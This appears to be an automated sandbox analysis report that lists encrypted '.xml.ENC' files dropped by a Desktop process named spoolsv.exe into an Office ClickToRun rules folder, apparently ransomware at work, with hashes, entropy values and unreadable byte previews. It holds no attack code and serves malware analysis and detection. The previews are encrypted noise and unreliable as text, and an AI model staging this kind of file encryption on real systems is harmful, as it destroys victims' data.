                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1600
                                                                                                                                                                                                                                                      Entropy (8bit):7.885033900489416
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/DgHIGowGELja2HvudGe+yTA+wFOIRNeFSa:tRw3jagvHuE1KSa
                                                                                                                                                                                                                                                      MD5:8FA861C68FEE8E85C9702EB0EFC68A98
                                                                                                                                                                                                                                                      SHA1:E390DE066A8B844592D8ED90827CB6E228D2590A
                                                                                                                                                                                                                                                      SHA-256:E94B43742F4B508BFD7B2D86415EB6F558772E477EDD295539FEAB08FE225BDB
                                                                                                                                                                                                                                                      SHA-512:71AEC35F5432E1BE415D7928D07840C66DA1B076130CE0F7CC9B85BDCA30770FAC8174CE590DEDCFBF24C95213065FBF90B22B0779F7CC3A6D4DBF8115B2ADD9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....U....8...M._.O.w.+A...#...x...By.gb).}.........A...d....$5....%..!.....m..J..c..>...F-..=......f..).....\.>.r.4..........s3i...:*j`...B.{..xU...c......R<..mY.,.. ........4Q.i{jU.x\.x..\...X..O....!?^4b....g..r.Ou.r..._.......4...e.TH.(..y..w....\..-\mrW..fd.._.....n..I...k.7.X....0..J +.W.>\r....Jo.n..$.y7O....i../dn...F...}.Pf..X.....?..b..............S.y.......yC..gz^l2m...HQ.|E..iC.l..i...V...MQq-.)X'.r..hpW'YC..n.X.i.N.....1fa8.....i...R..u.........HC..p@*........~.@na.j.+.....J#....Y.s....g..I....-f.<.n\.3....*..`>.R.......J.(du...Nd......x.{........=[P.o...z3....k0t.....V...r^Y#.<.C=l........sz.`.Q.]....].c.N.:....,...0.`%M.L.H....([.Y.C......Yo..z.=..$..lw.j..u.qG.....e..c...3v.....#@K.Z....&d5.....".V1....N.J..D....L....._N..bkw`.........@...N.Us.-.Ww...._.dm.7k...y*.%........B..cy.._.cE._;...|.Qr?....;..DNb..%....&..viD.+6 .T.....7(....W...Z...ma.......C1.PLd.1Z...y.....I.i.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230161v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):592
                                                                                                                                                                                                                                                      Entropy (8bit):7.684056516574574
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fm8GmGvIujUq4pP/BHH5gvRWMOAsaR/D3CRp2ige7bgAn:+8zGvI5PRZgJrsQ/KFJ
                                                                                                                                                                                                                                                      MD5:D77EB7310FB609B5DCF9680F49203FE0
                                                                                                                                                                                                                                                      SHA1:F8DE2C204A09263CCA70B64A436D9E0C9207FA23
                                                                                                                                                                                                                                                      SHA-256:78298AAA5C2C4312065D69E090F35E69B0605E8EEFFDD6E58730720FDA77AE27
                                                                                                                                                                                                                                                      SHA-512:AB7C5D69706B8978BCCBD88D93CD39C07864793C918BA4D61CED1883BD7A252CEDB673F6940445DCAF23425F5F5F30A76A8AF698704C186EB0549DA30377EE5A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I.d.B...7.7..j.f.8..XA....V./...*.1h-1{.../..C.u7....k....C.;......y.w.....F.`..)..#.....hc.}.....z.HK....ah...(...xFT-D.F..A4.M).4.....=g.e8.q9..D5.v........;.>....%J).?.C.....A.v.2.......A6.~...DK.99..R..m*L5"Q..sJU.(....r...vq}.H.\..f.9B..............n..h[..8S.}J...C......3 dT.a...{mm.>...y...T..]P....._*.|.W...r......1..O=@bKQ..!.\R(B....D.Q'..^x].~.6..Oy...MP.....!...3...xo...X..+.a.OM..f.8...(j..~RL.ao...I...o...#.u....Z.j...D..x.-.c...?c....[........mbu....u.I.l.q...2...$..~.H.(.{B.:\&.w..<wW..a?.m....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230162v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                                                                                                      Entropy (8bit):7.878020828730692
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/5iRKzkl5/3dVlPuFh10FJvnDeTG127WjrHqN5A:QcmVlbJvnN27g
                                                                                                                                                                                                                                                      MD5:AD13CE1EB1D06689661A1F4CF6EA702A
                                                                                                                                                                                                                                                      SHA1:6DA372A517A159064A04F67C4C9610270A5A2BAA
                                                                                                                                                                                                                                                      SHA-256:128C8917F45E859DB82AF4B45BEC6E1FF08C348EA4F8F54CA1CB88137A96381B
                                                                                                                                                                                                                                                      SHA-512:C46C5E044B395F8A6B1A58E0D33E0FF8B55532AB9D708FD5BD9F7077D692A8CDCA8537ABE3D7A60AB6D8951B3A01FAF4B2276BC481BB0C1E27DF41C5786985B5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..Q..A.c...L....wh>...........Fu.........x....J..<.F..>2x....E....|%....e..n..u....0............9...{.g.-.....{5.4.s.......Tp.-. u4.d....O.C#.2..a...._....U.....).7.P..,BgU...n.P.:....D&..Z.~_...E=.8rX.N.GL...."..;.P(...f....G.!...r.6.`#..u.>.Y.g.__...8..9;F...-....*.<..D^.........sf.l.9...._n).E.u.B......*+...&......*x..hf.%^.s.....:]..8),r....2.!&.-o....T...X{...p?.V......d*U.....=T$:.?...Z.......kL..n_...o. .5....8g..s$...+..E6./../.uo..\..#K7..aw...8k..P..p..1W}G_..N.Y#...k.-...I..P....]...L....eV...@....%."N...........uv~.E.0kv5q..qf......h.DL.............W.<..e..d....K.t.OB.Xw&J...t#.l....h?B.#../.|o....a.9F....l....5.|...+..B"k.Ej..D>..l..`...m:..s....Mu$.. .....b~5....n!.<.?.m.#')..(...df7.Su....:.B..'...D..7....'...."%../.QJ.@.X..6.Z..#<...Uf.(2A.TK.....E...Y...a..g.L..-.u........,.K.qZn..&..P...d.U8.".z..wX..d..:...[..N....".?..t.v...B)-}REv..l..=[w|1.p..^.....7P....r...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230164v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):864
                                                                                                                                                                                                                                                      Entropy (8bit):7.790204141662793
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/FPEfBdc5WKg5LY8JHfzlha/Q7qSkIbPlnpN:/8dcsncaHLBqSrxpN
                                                                                                                                                                                                                                                      MD5:ACEBBC1E7D2F57AFF29F181F07CDF17B
                                                                                                                                                                                                                                                      SHA1:DDF3BDFA76ABAD359077FCA03D7AE982CDCB1C51
                                                                                                                                                                                                                                                      SHA-256:334176DD3FF758053296C72331105D655559C6C4991B883666BD3F20FA301243
                                                                                                                                                                                                                                                      SHA-512:EB67F546957DF755B0E8A4DDBFA4BD6A82EC093DA1EB78688F5DC1FA9E7B090ABE6BDFF048A2BBDD7152217E5D146B13DE71DBD00E4A2B741166A21F4D6E385A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.p...4.t....=.......oQ.9.u...W.a.....r....F..V....~..|Q..&..D..Xi..#..I4..C....i.Q..p1OE.l.H.?.]\..s....2X1`[j.8.....|..n....A.h~.....0..C..B.`Oz.:...6',..fN.5qd......_x....t...?...pgr.zE..|nh@.=_..7i.t.......T.x.....y:..F.>...k...N^3k..n..d_.......:.._...#.....K.}...^..A.yDt..5x.A.'.\.~O.}..'8|.F.......t.V#..6....m\.....V.8......."8..].......V.Y."..1.i.6.W...\s....o.FJNvTC.}..Flc..O.2....hY2.........O....&..g9<I.......o.%.-../...q%...r.9(..9.c.IN.....1....Q.."...t...,..Fh..`..'J.x5<&.i.-..p..........P4:..!9....z.......v..7'3d...K..k....._IB}/..*..P.7.%... |....^q.U@m..7@....Ok.A.jE.......!.{g.Q@g!.^g.":(..i....=...J..P.......b.P..&.!k|.^...7.bW...........h.mn....7..Z.._.0,~.Ja..d.@.....".7...P....*9[3V..,..:BI.8ck..w?0.0....~..5.....c..PW.Sp=H6.'.ys9.A...Q?..YUw.L..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230165v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):864
                                                                                                                                                                                                                                                      Entropy (8bit):7.7660182655606675
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/d9oV5tWmuHdvUnLn9uHjmpQPNO0SoStFSsQhTb+Aw7X:/dACm6RUnL9xWPg8FnuPX
                                                                                                                                                                                                                                                      MD5:8FA7BDC7F24EAF82C09B28261307C1D1
                                                                                                                                                                                                                                                      SHA1:62605CB44EB56AEA11AC99020F0397762CAE2338
                                                                                                                                                                                                                                                      SHA-256:BFAC04750224B08FEF70B29FDAB579876DB80FFB2DE7D2B988713CAAA55EA1D5
                                                                                                                                                                                                                                                      SHA-512:F07C3F08C9B3E7EE9ABAC22B02F220AFAC63E32EAF4792A0AFFAAF3F7FEC3C0FE0C8DAF97E3F9FB008AD77C42F1E32D58E00FFDB0CFF7A607B3CA1F4C6198CE3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..~.eI.... .H=...J.....pfj:....]Sn$..Ya.~I.^+.;..[......b.(9.X....If ....m....G_[..R(<....X.....0}.|CdnAu.8......s....v.{.h.U...q...i.k.?......e.r......M.0.D4..A....R..No..C..lJ....^V@..l.vo :.X.i..c..Y.&f.(!+......G...el..PJ.J..mw+..b..D1........[l.9>j....../......y..|........V...6.5....kI...*..O.D..R..T...c^&..v...WM.F.F...6.^.z.}])l.-..S......[..w.B1..N....5,.O7<s&.Q(..+.....B..~......G2u."[...L~.T2P`x.)...GD..C..r...hiU..5(A.l..[;.G...>..K.k.Ba.7..p...lw..G....)..q...];._.... ..[.\.t a..7.T..t..<It......Y..C....."^..>.$....OT....=8......Bt&.5.ac..g.zw..n5....}G...PC4.1_....].$.4.3.t.Z..].K...P....5.5.D.?jh;.....v'....*...(...Rc..@NQ`\}....7.VJ..+L.x...P..H...%YW...>..............s...x..^.l.....c...J..Rv..%...$l...}C..a|.^....E..b:..Je.>.....y.t...).W..H2

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230166v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):768
                                                                                                                                                                                                                                                      Entropy (8bit):7.726529056984521
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2qcd86Y+yp2rD4KUuSygSCZ/Jky4INSlHoQst+RleBn7uk9xfjFEiPnH:/+56YRp0D4KhSV/9rzQsGA9pxEiPH
                                                                                                                                                                                                                                                      MD5:BA4254560B4471E57FD6D5D3C750A9F2
                                                                                                                                                                                                                                                      SHA1:2AC1636DB3A3CF265F371CD91B9EF77A6CA63F62
                                                                                                                                                                                                                                                      SHA-256:6C681AF9FD3E91285B81368648F35C2E7E607C7473C65158ACAFB787FC4E1800
                                                                                                                                                                                                                                                      SHA-512:08339680E28FDD7A5489246C2FCD4BFFF6B385BDD14776B065CDA6E48BF1FEC497C5E91513806E468EFFA8CF4681735156426A7E394C52BE237C9C10BE0DC772
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..#..."...g.2..y...E......R...]u.J...E.~....).}..#...&....!..ZN..E.N...f..&.Q...U.{.&6e.8I..T....2..R..:..H...L...V.r...TQ.~....A.........Hu...q.k.uc.5...j$.;..f.L..U2.../.L..1@%...k.F..?{../q......(O.@.K....[..Y..>FAsU......A."e.hM.,....Q.7P&7...6.wXjY....W....u@F...H5...i..p.K._5..m:..q...C..W.t.3....G6K.....&...t...... -..Qqd...........1F.....o.A...c..3.Z....$i.. ..Z.O.._s....mJ+Z3.wZ.7..x;].R...{...U[..^.x;........<Q....>..........{&...C.&.!b...z/Mk..n..Z..E6..EH-.:x....(I..T..n...V...6...N....={lz^...../..uc.u[mY.....(-X.W;O..}.......F.....y.\....5..lb..*...U.:..Y...N$OX....e..jG.....s...T....&..fH/...............G...K..L.U...V.... J.=p.Kf.Y..'.c....ce.FZ-....Ey|..%r.\F...N

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230167v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.851253124515148
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/22hq7+D+6Xmc/eQf/Jpsu12n2AaQuneKocruFdJozhT/oXdPpkGhuD+G:/22hg+hXTr/JpHE70eKocyDJwbo5pFM
                                                                                                                                                                                                                                                      MD5:0E8A3FD7DC59837F0C8C060AB9A7C434
                                                                                                                                                                                                                                                      SHA1:9446021A0098627DA7BE163DDC5CFCF8EDF20204
                                                                                                                                                                                                                                                      SHA-256:4483D3A4941D29B245EEC828E60264DF47AF3470A51F19828D0C040E1EF62827
                                                                                                                                                                                                                                                      SHA-512:1471C9D0AD2D99AE1CB1D3DC7299F19F87DD67ECD93F420B318F596137C2590B3F8008A3AA04A9F48A9513ECA0D246F1B5961BBFEF7FAE1A01FCFA50FD3BF8AE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..Q..fk$.._.P.V.8+...'..4\u..].C.o..)...l.,v..~..3.H6...?......2..6.I-.A.]..$......>.L.nIu..V..@...4.....!.]..Jx...q.{.].T....-..'...j...J.....`....[G.......]>..if...?s.VN.p.6...H..#..QRH...#.j.Z. .3.U.R'.:.+a...t0-..1q8re.J..@y..d.....r!L.....3.N.`Lv....&D...Z.%.....y........3.-x...9..V..S...zz...bU....d6B.$. ...........E.........#v&....%.......h..*.u...7a..8..?!O..1..K}'...I7|....(C...I..)MpK......~0...b....._.m..!.6...Bh.......1...l......z..3...d.h/...?..c.g%......6.."d.;W...6.Xz..hp...).R..1.W..,..f.I..Y.RD+`.se..(.)..]VZ...<..N...._&...d..*....h.[x'.... 6O.9....c...X...'.)..\.e..!3.C...p..o..Qq4[7P'l..'$.m.....wm...$.K..j.,.Q@....q.!..t....Q..F......k..<.?..o....l.RE......s....P..78.....I.!?_.CJDh...7YD..3A.... M<(J8L=.L.0.?.CT)q.Ni..0...2!K....&.....!...hY0:.<:......m..l..!.i...l.@]._+..6..e`\y./.. .U.jI...Xs.!.f..z...Nc.<..iM..K.U..*|.....R.......DC.r.....38g.(?....8.....)...l.k../..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230168v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3120
                                                                                                                                                                                                                                                      Entropy (8bit):7.942084210821356
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/QRPepc5se+Nb+2kzpGDSOHOUPtfiVehql4e1a3QtprQ4bAQkeC+yqYKio+:aGUh+J+6LX1fFqKeseWeXTO
                                                                                                                                                                                                                                                      MD5:BFF6ECF4B1DB266C9A1692285AC1DAB1
                                                                                                                                                                                                                                                      SHA1:2519B77ECE15A44F475293F52AA1B7A586AD8422
                                                                                                                                                                                                                                                      SHA-256:4D9C40A685CCAE958BA5682115F1DAD790AAE8D77273F882B40A78E949B83910
                                                                                                                                                                                                                                                      SHA-512:7E552EC0D2C42B460A06176BDCBBEA3C6F2E55B1FE333571063DCD7A98F66945A061639DD8F1A3D29F0D706D250EF25A204F490A0AE3B057CED7CD60C6B60E21
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...@.R.r.....D.....$0...N4.\;..i...h...."H.e...q....J.?./.}r>.....z[`M.o..s.n..OL....z.......h.jk....G.rU......J..~...6_.F:..X.v$......t.......o.G.T...ur..NE............E.....-J...F,h.......w29.|.....v./...B...!..O.k...../y.X..a..w..(..H..w.'.?.Y.*G.....N.o^....P....1.-....d..dU....V..%.*Z@.....1.6..!0..a..5..Ol..m.!....U..........N:..@.......(:......Z]..NU1.@..V.....A...k.v.YV.>......MT..x..!.{.U...G.7.T0..5W.K..'.~.u..|fF..UCi.D..]..e.'X.~.-<...m..e6...).5eX....P..V......g;gj. Q.."6zg.9...t.)..B...l..s....d~.;aF.n..M.a......,...~.....P. N?.0..Cp2..=.Q.I..."...[.P.;....G.B...V.K..w.. .S.....V.2y\..[<c..\Q.?.$..J..mh^,t.........A..g...S.AO.I.j.....:.......j..e-.&..0....[nw..t.....r.7z.I.F.[.QJ..#HA..].D...C.>......B3._.:.6....C..R.bU[.8.B..#.O*i..t..-...&..O...1..L..`.h.d....Z.<.....9.............Vl0.{.L...jZ.b..7.#2uh.d..r..........z.&[..=.&.UG;R..T.q~..F......t.......T....L.Q.2.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230169v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):7408
                                                                                                                                                                                                                                                      Entropy (8bit):7.970974634947745
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:qZgYilhAiM3pY7OfHoNLve3Lm7b8wsw2YmsbTNlEn/aTUg8:qaMiKJOLveS7f2YmsfNWCb8
                                                                                                                                                                                                                                                      MD5:8D69111F5DC913F60D2518B4079DE199
                                                                                                                                                                                                                                                      SHA1:91EB62136DD30F4B3C3FBBB10C37EC3F2F74551F
                                                                                                                                                                                                                                                      SHA-256:CA51F241D2FF83B36DB4A9004387DC281B50D65B2EE2F8817B41D09D2168D56F
                                                                                                                                                                                                                                                      SHA-512:7FB7FD488AB743427F8899B2D3D7217A2F2F9DD3DA815D3A024613B64A07263719FB4B9B1EF958FB1C9781CE4FDA9FB2F02E14305E4D20AAF7AE5D8D61AE1798
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..T9Z.n.e.B.r..G)...>(a..?..7&. ..9i.k"q...=.S.q.....k..?d.%.r..'...@m?.v.W..<..|....W.+2.p(c.W....t.jW)p.Xqh...b...........{..J.a.V.L.^e..1....OS.^.(E...FD%..sv.s..."yV....t./0mq..|...^.K...j.w....tP.!H.r..K..J1......+......=.O.LO..#..o....4A..?A2-(.....Y(..X=f.V7.).z..w...f<.C..[)..C.G..7..?..n.....}.'....j....'H..g|..l.H..~U...[...a.~..Y......P..A.y.q ..?6<v....b{...0.n.W..)...1QTl|0..bk.C.{S.<`.m<...7u.C...._..5.C.K.F.kjB|.t.n.k .z.j...E...1..Xqzn'..3.....O&5....d.3Ggl.B+...d...c"...&[r 8h...2X`.5...w5.b.....+E...(U......q...|n.x.7........6|..."P.....mN.B.V7...L...m:..D.e.?...#...O..f ...*..&..2.........2.....^wA..=r...Ws'{F...oFv......, .t0.....l.S.A.P..r\..?........Q#<....L../.u6.:;J..RmAd{....n....7~p.........'..Ra..#.....-.}..x...@...a6......_.I....).*j..lN.Q..;.....7R..V..6...^/g<.A.....e...F..C._.an...Jj...C....... .;7.D.M....N.@.;..?........=.>...?..h=....<..A.U"7.LO...O...V.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230170v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):23632
                                                                                                                                                                                                                                                      Entropy (8bit):7.990266615538004
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:4x9j/qs9BGoUK2/Ik66509LTPRiYl+BeO6ltjX6LhmQfzMcDQPgvFLNEr8na94:4xJiOGXL/l66a9H4TKLOLh9Rv5La+
                                                                                                                                                                                                                                                      MD5:8EC09FCFB2EF74BECBE1C20CB0002C0E
                                                                                                                                                                                                                                                      SHA1:E9BE440C61591BB27E78DE5E0F18C3833713CDDB
                                                                                                                                                                                                                                                      SHA-256:CE85EF232867FF18382088C7B168E5466BAE6323F85B50AF3760F27767E5C19B
                                                                                                                                                                                                                                                      SHA-512:66FDEB42BED479B72F28DAD84E2619420BFBB65B626C7BA393584A808701C48E41801563ED4A7784832C8BA822CBC0DF9F8AF280F144B4A41F4A5067F7DC041E
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......`f.k..O.....n.....B...R.k.~a../M.s.>ic.X.E.^.U......!....w.\qi.....}..H.Hi...`......o.8v.,.X.R...W.4v4)..c...r.YWr...+H...2......I..Z..?.z.....X......j.,...C....g...7.BD........X._..2..|.K>I..[[.m2..u...!............b':..!.K}.. b,..F.!..11ly!.<..<7Wq.'C....WH.E&s..p:......4.E......!.h..^.1....#9.?.`....j$..._.0.X`.j..P.FYMuU0..u..is.:..%...hL.j$Y.x.V}.}....nZ.G.`..5.7\3..9.\.......g2.C....T..etfjy.f.q.&...3..:k.. ~_....sc.o............m...q..5)1.#....M..d61.`..=../.Y.?.........5..'9j.6..1..Z..e...........#.... .4\o}..o.1.bG8.D.@..6^o...t\o@...#Q.d$......c`....L.&.p.jOt.Xi.R..`...Y...~".-.. .7.D.E.....]...b.K..+6...W...4O.....&...........6.].....Ji..%../...m.ZI.-.R..D..|y."...D.m.k...r..&e...-."R.......0....).......nA.k...i.&L.@..;..G..R]].....DG.:.,^..."c..Lc.*.:......L.._.....S........HJ.....O./.....F.y=.s...b...<=.`.@).t..!..,..k.X...Qw..0...m.1<._4%AIs....>.....+7.p.U.w.15.KB.o.i..7.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230171v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1440
                                                                                                                                                                                                                                                      Entropy (8bit):7.847803214989915
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/t9J57nTbMJ6a5OqxetOQJ5lHu5R1o77yjM9SRaItDmVMczRlaUVjf9h9nCtA0ud:/t9J5nTbMJ6aQqxeXJ51qESjoGNmpRhl
                                                                                                                                                                                                                                                      MD5:0E1C3721C3005B5294894EE762216E03
                                                                                                                                                                                                                                                      SHA1:7060C05499CA40F39045E10E2D0A0BAD4D03D9DD
                                                                                                                                                                                                                                                      SHA-256:8D2102EF182CB1869804C2CD9F33E32DBDC62FC1BDABE2ED4283FD696FF81D47
                                                                                                                                                                                                                                                      SHA-512:ED54948B2811730D8532750D740CCF7D51B10B78A29C6C366B3411A420A9DBAD54F0E1FE92B04BA401DB836AFDC5DAD77DDE4FD87742E233982B76B405DD7DAA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.......+G....5./.G..F.A...Ds n.w..^>..Z...5...#|..|..UTY..x....("...p..P....m;...... k...b.Wd...j..WOxsMl.... ......U.U|..3.2...:..T........~..T.S._....5...R/,....j....1.j..[i...e.=....x..\1ae9B.Y..+.t.........=.r....3.`.....o......`h.i....R....l..kV.m.$.'......}mu. .)T2~.[....?...J..3N.#/...(.&ER."...<$8..NlE.(@..7\kA...b!.3}..m4.hv.e./q..YY.l........c......p.F5p.|...~W|#.....:X...O.fFj.k..S...;?...R..{=V~.j. ... .$>..>..0..c.3.".f.\...V....R..n>.....v!..o.#I...}.....o.Z.6.........m+..5.'...W...q...0X........>Y...b.....f.[.4...p.........#|.7...`..G.9..C./.u.2K+.-...T..w.4pb."..[.-...(......D.A..5.......Y.N..$.B....1.p..v.....0.d..N.Ek..a..7.kd>.._S....k>uo.8.....y)N.oZJ~.8...x"L.A.../....^#z....*....N..E....N`.....N=...^=....G.A...X.W......t+r......+.......E..3SV......h$EB.^..y.F|..... 0..G.S.."..........5..Z.O....M.E...d.....S..}.....(....1..o...*\`[..;..f3.I.J.....5.[.;^./...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230172v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):31424
                                                                                                                                                                                                                                                      Entropy (8bit):7.993824423199513
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:pWR4P4MZnMujzl1XhZDE3i9KPZGYRXFEKLXUAq:n4FOh1XvE3i9TYtzq
                                                                                                                                                                                                                                                      MD5:2CA8961D8518255F0AF95AD742BE36E4
                                                                                                                                                                                                                                                      SHA1:4028086AF0F9A20A9EB4F70D8F8DC12F04A0DBD7
                                                                                                                                                                                                                                                      SHA-256:0375CCD7B685795AA170D4CE2BC018080EA89937C25BF5E7A643D0AF3F56598C
                                                                                                                                                                                                                                                      SHA-512:0555094238FEE01450470309B805EF65B098A4B3462BCFCB19D8A67208C2FFE31C6C973A253AF6D456321B83E3804BF1A4A99DC3C3CC8BA6623F68F02EA98436
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..lG.q.E.L=.......g{.C..,)..W..Q.}p.D<.}..K.]...Y..ld./...j....;.ws...4B...]......".1+;..P.\....<*.B..U.k......8rt.0...8..y.B...'..Xz/..W<jM;.`R.!i.&"5.7. ....0O..^6."m.lr..!.....h%.cy..Nc=!.mE.3)..S.[.]r...D...o.s..o.$.o.].u.;......y..o..=(!.9.?..Q...X^......v...-.....2]R+..E.Me../+.Y...+4.q....<......atOT7K7.>.vc.......7....N.......x..p............oz..=..WV.l"./X.Y..D..)0. ..6..2RY.'+...P.......'k..GWvGE0.F.?.D4..N[.M.l<v*.c..(dp..+.%..7...+.6..[...5YJ......V@j.l....b.O..2.....\#..{z.3{...TcRW.Egb.N.X.C...2S.A...9j...1?.MX.._Kze..&).gF.h.}#..7.7.Bh..c.....N.r...M......M#c........ .e....i3.4>..{.......%%~Ax..f._k..Aa0.)R.w./G...[p.t....-..G...K.....yc.......V.....{^]..@0O'1. y9?D.K...!(..2..N.....1.....R.4....%....I.l..=Y%....X....$.|.TsL.....*...e`.!.%..K.n.1.1...O...{..`...NL._>.....M..:..].\v...i. T..V,~....k.@..L.....q3z...wD..E*T^a}.?ca.iP..r*?.v`Z.D...?.F...I..U=N.'.F..3..D....H..........Z..V.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230173v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
